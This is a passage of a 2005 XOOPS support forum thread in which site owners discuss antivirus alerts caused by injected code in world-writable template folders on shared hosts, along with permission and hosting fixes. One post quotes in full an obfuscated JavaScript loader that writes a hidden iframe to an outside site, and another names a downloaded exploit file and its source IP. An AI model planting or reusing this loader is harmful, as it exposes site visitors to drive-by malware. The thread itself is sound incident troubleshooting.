11
m0nty
Re: Norton detected virus on my XOOPS site
  • 2005/6/22 23:01

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


could we not reduce that risk even more, by compiling the templates to MySQL DB instead of as files?

12
Lance_
Re: Norton detected virus on my XOOPS site
  • 2005/6/23 0:17

  • Lance_

  • Home away from home

  • Posts: 983

  • Since: 2004/1/12


If it wasn't world writable, wouldn't that solve the prob also. Not thoroughly knowledgeable of permissions so do clear up please.

Cheers.

13
m0nty
Re: Norton detected virus on my XOOPS site
  • 2005/6/23 0:34

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


yeah i was thinking that lance too..

surely there must be some way of utilising the permissions of folders? maybe somehow assign a group permission that the script can use to write files to the folder, but not allow outside users to.. or maybe the script to chmod the folder to writable as and when it is needed, and after compiling it then changes back to 444 or whatever.. (altho this could cause problems with windows IIS servers.. but an if statement could possibly get round that problem. :S i dunno, i'm just pluckin at ideas.

14
m0nty
Re: Norton detected virus on my XOOPS site
  • 2005/6/23 0:41

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


possibly (on unix/linux servers)

.htaccess ?


Order Allow, Deny
Deny from all
Allow from yourdomain.com


or is there another method of allowing on scripts or 1 particular script ie. compiler.php to have access to that folder only.. any other script etc even if located on same server would be denied access?

15
straycat
Re: Norton detected virus on my XOOPS site
  • 2005/7/21 23:27

  • straycat

  • Just popping in

  • Posts: 2

  • Since: 2005/7/21


I just came across this "exact" same thing on a client's website. Was there ever a determination on how you got it and what could be done to prevent it? This is driving my client and me crazy! ANy furhter insight in to the problem would be appreciated very much....

16
straycat
Re: Norton detected virus on my XOOPS site
  • 2005/7/21 23:31

  • straycat

  • Just popping in

  • Posts: 2

  • Since: 2005/7/21


Did you ever find out more about this? I have the "exact" same virus?code? appear on one of my sites. Quote:

phppp wrote:
I am building a new site for XOOPS 2.2 and MarcoFr reported virus
Quote:

Norton detects several viruses :
. Downloader.Trojan
. Bloodhound.Exploit.6


After checking the source code, I found one line just before
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);script>


What does it mean?
How could the scripts be generated?
If anyone happens to have same experiences, would be an interesting topic

Additional:
1 the scripts disappeard after I re-uploaded the "default" them
2 I think there is virus on my computer (WinXP)

17
skalpa
Re: Norton detected virus on my XOOPS site
  • 2005/7/22 0:39

  • skalpa

  • Quite a regular

  • Posts: 300

  • Since: 2003/4/16


Quote:
could we not reduce that risk even more, by compiling the templates to MySQL DB instead of as files?


But that is not the way to think. Such a configuration is severely dangerous and lame, and you should not dare having to deal with such a hole.
Whatever happens, if other users can do this then I bet they can easily read mainfile.php and get your database password, so whatever you do will just be placebo measures.

There are many PHP or 3rd-party based solutions that allow to provide secure shared hosts, and that work well. If your hosting company doesn't want to use one of them, then I think you'd better give your money to other people.

skalpa.>
Any intelligent fool can make things bigger, and more complex. It takes a touch of genius, a lot of courage, to move in the opposite direction.
Two things are infinite: the universe and human stupidity; and I'm not sure about the 1st one (A.Einstein)

18
Chappy
Re: Norton detected virus on my XOOPS site
  • 2005/8/3 4:51

  • Chappy

  • Friend of XOOPS

  • Posts: 456

  • Since: 2002/12/14


I had this as well. My site kept wanting to download newexpl.php coming from IP address 85.255.113.4.

I thought that it might be related to the exploit mentioned for the netquery mod. Turned off the module and even uninstalled the module and no joy. Then deleted netquery. IT still seemed to be trying to download the file.

I reuploaded all system files, the modules that come with 2.2, and deleted everything in templates_c. That seemed to fix it

I'm running 2.2. IE/XP sqealed like a pig when any page on the site opened up.
MMM...It tastes like chicken! ...

19
Tefnut
Re: Norton detected virus on my XOOPS site
  • 2005/8/3 14:59

  • Tefnut

  • Just popping in

  • Posts: 36

  • Since: 2004/9/13


i've been hacked too.

there something strange:
look at your upload directory.. you find a strange php file?

this hack is solved with last patch?

20
Mithrandir
Re: Norton detected virus on my XOOPS site

The problem to solve is this:
How can we have the webserver write to the templates_c directory without letting everyone else who have sites running on this shared webserver write to it?

Often, when running Apache, the webserver runs as the user "nobody" - for all the websites on the server. However, you upload files through an FTP user with a different username. Therefore you need to set the permissions for the templates_c folder to world writeable, so the "nobody" user can write to it. However, this means that since "nobody" is also running the other x websites on the same server, their scripts can also write to your templates_c folder.

What can you do about it? Not much.
What can the webserver host do about it? There are base_dir restrictions that can be applied, safe_mode settings can be configured - or the webserver can be configured to use PHPSuExec where each website is run as a separate user.

We would love to help out where we can, but this is mainly a server host configuration problem.
If the mentioned security measures bring problems with XOOPS, we will of course work on eliminating the problems, but securing an insecure host through PHP scripting is not all that easy.
"When you can flatten entire cities at a whim, a tendency towards quiet reflection and seeing-things-from-the-other-fellow's-point-of-view is seldom necessary."

Cusix Software

Login

Who's Online

300 user(s) are online (201 user(s) are browsing Support Forums)


Members: 0


Guests: 300


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits